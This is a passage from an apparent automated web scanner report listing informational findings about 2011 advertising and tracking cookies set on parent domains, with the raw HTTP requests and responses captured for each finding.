anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYAiACKAIw-pSg7gQQ-pSg7gQYAQ..; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb976848=5_[r^kI/7Zw[-!!0nf8M`P4+Q?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP-kewMldWkJ_SsYda6b2ziV6CshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA7w4BAgUCAAUAAAAAMiaD7wAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955522%29%3Buf%28%27c%27%2C+61473%2C+1304955522%29%3Buf%28%27r%27%2C+272040%2C+1304955522%29%3Bppv%287166%2C+%279169991150143020777%27%2C+1304955522%2C+1336491522%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:38:34 GMT
Content-Length: 756

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-49643098_1304955489,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...

10.28. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=101339&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_VsdNmQotNi@m4]2M2UNvB^a*m(qsP<$5Y8+$btG4Ak815t9uZT9Y!Tss2(U=u08T#U*@.xf`p:/Y=@C'V`%3VDqSpO@2LNZ!a`mkrE=4S%OOWjxx?I%f.`8P<Q_=:K!N$S@p'W+mpx*RcdvEi=A'#X@PH+HTK.^[b/a`!b`#0B@$kf.F^2QqXMVbeza'$l/3mV)X=JbA6Dg2elt<r$Y2-LH'3+IRb[FhsHCNft/g2g4RKbYm([]%2pZmoc2O!J^AMCh5bcwNx(n]g=GtY31<eFv=Py[$vPQoKQvElD]jJ?WfA/mkYXJ7^YX%RfRfRP:B4Z:9)LOWaVQ._BYWVIt9SF3qfRr>MH2W4cYAiW:f92EX!%l#-=WZMff'fhbMApWS<YV1Fhq@f^5^1!7tcd#9Tdp::!P@XBy<13HmsxW[=X*.JJZAZnXKfBb0ZkTQDm.8h6r:GEYo'apKW77#x>UomXwbCI8b[s00xdd5UEfSDB=f<o'@gNUP)v6ITb?O-]le_)Ef0+aq9aCbvK/[`(!X92Jj!xp88_699MG!SR'2XPaU>9U<.1_BU7EhhEGpC$Dl]#Jj1o$JVk<kds/pZAV[23<*Wg2v^crt$`<vw8HjZ)4K>b:4bVPY; path=/; expires=Sun, 07-Aug-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly
Location: http://tags.bluekai.com/site/3775
Date: Mon, 09 May 2011 15:35:46 GMT
Content-Length: 0


10.29. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=073b4702-bd65-4b9a-ba5b-edcd599ebdea HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265; domain=.interclick.com; expires=Sun, 09-May-2021 15:37:51 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:37:50 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

10.30. http://image2.pubmatic.com/AdServer/Pug

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889; domain=pubmatic.com; expires=Thu, 01-May-2014 17:54:49 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.31. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=media27_cs=1&betq=13111=435181 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=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; GUID=MTMwNDk1NDk4OTsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=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; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: GUID=MTMwNDk1NTM4MzsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 15:36:23 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 16:36:23 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.32. http://map.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=6169&pcv=48&cb=8467213627&topHref=http%3A%2F%2Fwww.csmonitor.com%2FBusiness HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt11400gxzt1tr37xzt1tr37xzt11400gxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh1443x0113l040k0450n; rdrlst=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; sglst=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; vstcnt=417k010r154exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh144d60123l050k0550o; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Set-Cookie: vstcnt=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 15:35:19 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=l3pmCL-AvwIQi4DI6wM&guid=ON&script=0
Content-Length: 0
Date: Mon, 09 May 2011 15:35:19 GMT


10.33. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.639346786076203&sig=d HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955408827; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:48 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: recs-8277e0910d750195b448797616e091ad="0Md6VLP4uVjlx5iB105rBFRGss1g9D1+UIrDZa62H8d9q/U+7rfsSHzfTAzVZtzvGFOIAx+Zi6c="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:48 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Content-Length: 5487

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'cfa057c0cd3cd3e521294623f49f9d62'},'score':{'preferred
...[SNIP]...

10.34. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.4678053397219628&sig=li HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:56 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955416503; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:56 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:56 GMT; Path=/
Set-Cookie: recs-d70c1e5d44de8a9150eb91ecff563578="yoz9obW/2XhfIb4e31QLF+S7Xa4bySS399HA3bzA01t8TBqoY5+CsuLi96Cxd+UejaFla9pteKU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:56 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:56 GMT
Content-Length: 5444

outbrain_rater.returnedOdbData({'response':{'exec_time':17,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'ee2d80d8f79db75191b6df986070973c'},'score':{'preferred
...[SNIP]...

10.35. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.5672100060619414 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 09 May 2011 15:36:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

10.36. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
